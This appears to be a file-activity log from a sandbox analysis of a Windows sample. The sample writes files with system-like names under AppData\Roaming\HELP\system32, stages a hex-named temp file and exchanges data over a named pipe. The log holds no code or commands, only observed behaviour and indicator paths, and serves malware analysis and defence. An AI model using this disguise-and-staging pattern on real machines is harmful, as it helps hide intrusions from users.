| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
6 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
6 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | \\.\pipe\c41b2304 | desired_access = GENERIC_WRITE, GENERIC_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | \\.\pipe\c41b2304 | desired_access = GENERIC_WRITE, GENERIC_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
4 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
4 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | \\.\pipe\c41b2304 | desired_access = GENERIC_WRITE, GENERIC_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
6 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
6 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | \\.\pipe\c41b2304 | desired_access = GENERIC_WRITE, GENERIC_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | \\.\pipe\c41b2304 | desired_access = GENERIC_WRITE, GENERIC_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
4 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
4 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | \\.\pipe\c41b2304 | desired_access = GENERIC_WRITE, GENERIC_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
6 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
6 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | \\.\pipe\c41b2304 | desired_access = GENERIC_WRITE, GENERIC_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | \\.\pipe\c41b2304 | desired_access = GENERIC_WRITE, GENERIC_READ |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Local\Temp\\ | - |
|
5 | |
| Create Temp File | C:\Users\EEBsYm5\AppData\Local\Temp\~DFBEBC.tmp | path = C:\Users\EEBsYm5\AppData\Local\Temp\, prefix = ~DFBC |
|
1 | |
| Create Temp File | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF7F5.tmp | path = C:\Users\EEBsYm5\AppData\Local\Temp\, prefix = ~fgh |
|
1 | |
| Create Temp File | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF844.tmp | path = C:\Users\EEBsYm5\AppData\Local\Temp\, prefix = ~fgh |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\mskfp32.ocx | type = size |
|
2 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
4 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
4 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
2 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
6 | |
| Get Info | System Paging File | type = size |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\olestdmp.ocx | type = size |
|
2 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp | type = file_attributes |
|
2 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx2 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx2 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx3 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx3 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx4 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx4 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx5 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx5 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx6 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx6 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\mskfp32.ocx | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\mskfp32.ocx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\mskfp32.ocx | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx7 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx7 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx8 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx8 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF7F5.tmp | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx9 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx9 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx10 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx10 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx11 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx11 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF7F5.tmp | type = size |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
3 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx12 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx12 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx13 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx13 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx14 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx14 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx15 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx15 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx16 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx16 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx17 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx17 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx18 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx18 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF844.tmp | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx19 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx19 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx20 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx20 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx21 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\xx21 | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF844.tmp | type = size |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\olestdmp.ocx | type = size |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
2 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\olestdmp.ocx | type = size |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | type = size |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
6 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | type = size |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
6 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | type = size |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | type = size |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
4 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
2 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
6 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | type = size |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | type = size |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
4 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
6 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | type = size |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | type = size |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Get Info | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Copy | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | source_filename = C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\olestdmp.ocx |
|
1 | |
| Read | \\.\pipe\c41b2304 | size = 65535, size_out = 13 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\olestdmp.ocx | size = 4, size_out = 0 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\mskfp32.ocx | size = 32768, size_out = 3482 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\mskfp32.ocx | size = 29286, size_out = 0 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx2 | size = 8, size_out = 8 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx2 | size = 2398, size_out = 2398 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx2 | size = 8, size_out = 0 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx3 | size = 16, size_out = 16 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx3 | size = 256, size_out = 12 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx3 | size = 16, size_out = 0 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx6 | size = 8, size_out = 8 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx6 | size = 8, size_out = 0 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx5 | size = 32768, size_out = 28 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx5 | size = 32768, size_out = 0 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx4 | size = 32768, size_out = 2406 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx4 | size = 32768, size_out = 0 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | size = 32768, size_out = 1049 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | size = 31719, size_out = 0 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx12 | size = 8, size_out = 8 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx12 | size = 926, size_out = 926 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx12 | size = 8, size_out = 0 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx13 | size = 16, size_out = 16 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx13 | size = 256, size_out = 12 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx13 | size = 16, size_out = 0 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx16 | size = 8, size_out = 8 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx16 | size = 8, size_out = 0 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx15 | size = 32768, size_out = 28 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx15 | size = 32768, size_out = 0 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx14 | size = 32768, size_out = 934 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\xx14 | size = 32768, size_out = 0 |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | size = 3516, size_out = 3516 |
|
1 | |
| Read | \\.\pipe\c41b2304 | size = 65535, size_out = 308 |
|
1 | |
| Read | \\.\pipe\c41b2304 | size = 65535, size_out = 13 |
|
1 | |
| Read | \\.\pipe\c41b2304 | size = 65535, size_out = 308 |
|
1 | |
| Read | \\.\pipe\c41b2304 | size = 65535, size_out = 13 |
|
1 | |
| Read | \\.\pipe\c41b2304 | size = 65535, size_out = 308 |
|
1 | |
| Read | \\.\pipe\c41b2304 | size = 65535, size_out = 13 |
|
1 | |
| Read | \\.\pipe\c41b2304 | size = 65535, size_out = 308 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | size = 66 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\mskfp32.ocx | size = 100 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\mskfp32.ocx | size = 3366 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\mskfp32.ocx | size = 16 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | size = 76 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | size = 31 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | size = 133 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | size = 32 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | size = 24 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | size = 45 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | size = 55 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | size = 116 |
|
1 | |
| Write | \\.\pipe\c41b2304 | size = 138 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | size = 42 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | size = 29 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | size = 151 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\olestdmp.ocx | size = 16 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\olestdmp.ocx | size = 4 |
|
4 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\olestdmp.ocx | size = 2478 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\olestdmp.ocx | size = 1006 |
|
1 | |
| Write | C:\Users\EEBsYm5\AppData\Local\Temp\\6F6C657374646D702E6F6378FF.tmp | size = 4004 |
|
1 | |
| Write | \\.\pipe\c41b2304 | size = 4261 |
|
1 | |
| Write | \\.\pipe\c41b2304 | size = 8 |
|
1 | |
| Write | \\.\pipe\c41b2304 | size = 132 |
|
1 | |
| Write | \\.\pipe\c41b2304 | size = 4271 |
|
1 | |
| Write | \\.\pipe\c41b2304 | size = 8 |
|
1 | |
| Write | \\.\pipe\c41b2304 | size = 134 |
|
1 | |
| Write | \\.\pipe\c41b2304 | size = 4263 |
|
1 | |
| Write | \\.\pipe\c41b2304 | size = 8 |
|
1 | |
| Write | \\.\pipe\c41b2304 | size = 140 |
|
1 | |
| Write | \\.\pipe\c41b2304 | size = 4265 |
|
1 | |
| Write | \\.\pipe\c41b2304 | size = 8 |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx2 | - |
|
1 | |
